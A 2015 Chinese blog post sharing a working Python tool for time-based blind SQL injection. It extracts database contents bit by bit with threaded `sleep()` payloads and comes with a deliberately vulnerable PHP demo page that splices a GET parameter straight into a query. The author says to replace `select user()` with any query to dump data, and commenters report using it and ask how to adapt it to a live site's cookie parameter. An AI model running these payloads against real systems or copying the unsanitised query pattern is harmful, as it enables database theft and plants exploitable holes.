python利用二进制延迟注入demo

看了freebuf的mysql延迟注入课程,感觉他那个突破延迟注入时间限制的思路非常不错

课程地址:http://yuntv.letv.com/bcloud.html?uu=cbb16903e4&vu=f69b1ac857&width=1024&height=576

然后自己写了个py的demo,代码写的渣勿笑~

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Lcy
# @Date:   2015-08-29 22:26:17
# @Last Modified by:   Sunshie
# @Last Modified time: 2015-08-30 01:48:41
# blog:https://phpinfo.me
# 延迟注入工具
import urllib2
import time
import socket
import threading
import requests

class my_threading(threading.Thread):
		def __init__(self, str,x):
				threading.Thread.__init__(self)
				self.str = str
				self.x = x
		def run(self):
			global res
			x=self.x
			j = self.str
			url = "http://localhost/demo/1.php?username=root'+and+if%281=%28mid%28lpad%28bin%28ord%28mid%28%28select%20user()%29," + str(x) + ",1%29%29%29,8,0%29,"+ str(j) + ",1%29%29,sleep%282%29,0%29%23"
			html = request(url) 
			verify = 'timeout' 
			if verify not in html: 
				res[str(j)] = 0
				#print 1
			else:
				res[str(j)] = 1
	

def request(URL): 
	user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' } 
	req = urllib2.Request(URL, None, user_agent)  
	try: 
		request = urllib2.urlopen(req,timeout=2) 
	except Exception ,e: 
		time.sleep(2)
		return 'timeout' 
	return request.read() 	

def curl(url):
	try:
			start = time.clock()
			requests.get(url)
			end = time.clock()
			return int(end)
	except requests.RequestException as e:
			print u"访问出错!"
			exit()
def getLength():
	i = 0
	while True:
		print "[+] Checking: %s \r" %i
		url = "http://localhost/demo/1.php?username=root'+and+sleep(if(length((select%20user()))="+ str(i) +",1,0))%23"
		html = request(url) 
		verify = 'timeout' 
		if verify in html: 
			print u"[+] 数据长度为: %s" %i
			return i
		
		i = i + 1
def bin2dec(string_num):
	return int(string_num, 2)

def getData(dataLength):
	global res
	data = ""
	for x in range(dataLength):
		x = x + 1
		#print x
		threads = []
		for j in range(8):
			result = ""
			j = j + 1
			sb = my_threading(j,x)
			sb.setDaemon(True)
			threads.append(sb)
			#print j
		for t in threads:
				t.start()
		for t in threads:
				t.join()
		#print res
		tmp = ""
		for i in range(8):
			tmp = tmp + str(res[str(i+1)])
		#print chr(bin2dec(tmp))
		res = {}
		result = chr(bin2dec(tmp))
		print result
		data = data + result
		sb = None
	print "[+] ok!"
	print "[+] result:" + data


if __name__ == '__main__':
	stop = False
	res = {}
	length = getLength()
	getData(length)

1.php代码如下:

<?php
/* 
* @Author: Lcy
* @Date:   2015-08-29 22:09:59
* @Last Modified by:   Sunshie
* @Last Modified time: 2015-08-30 01:46:17
* 延迟注入测试
*/
header("Content-type:text/html;charset=utf8");
$link = mysql_connect("localhost", "root","");
mysql_select_db("mysql", $link);
mysql_set_charset("utf8");
$sql = "SELECT user FROM user where user='{$_GET['username']}'";
echo $sql;
$query = mysql_query($sql);
echo "这是一个没有任何回显的注入点";

?>

py

如果要爆数据啥的话就改py代码里面的select%20user(),替换为你要执行的sql即可

Tags:
文 / admin
5 COMMENTS
  1. 2015/08/31
    jzking121

    谢谢博主,非常好用,已转载,并附上原文链接!

  2. 2015/09/03
    ki11

    不错啊。顺便问下,影牛,博主主题自己写的还是网上的,告知下~谢谢

    • admin
      2015/09/06
      admin
      @ki11 网上的
  3. 2015/09/14
    小白

    很好用,速度快了很多. 遇到一个站,cookie里有一个参数有延迟注入,请问博主你这个脚本需要修改哪些地方?

    • admin
      2015/09/15
      admin
      @小白 百度 urllib2带cookie请求
LEAVE A REPLY

loading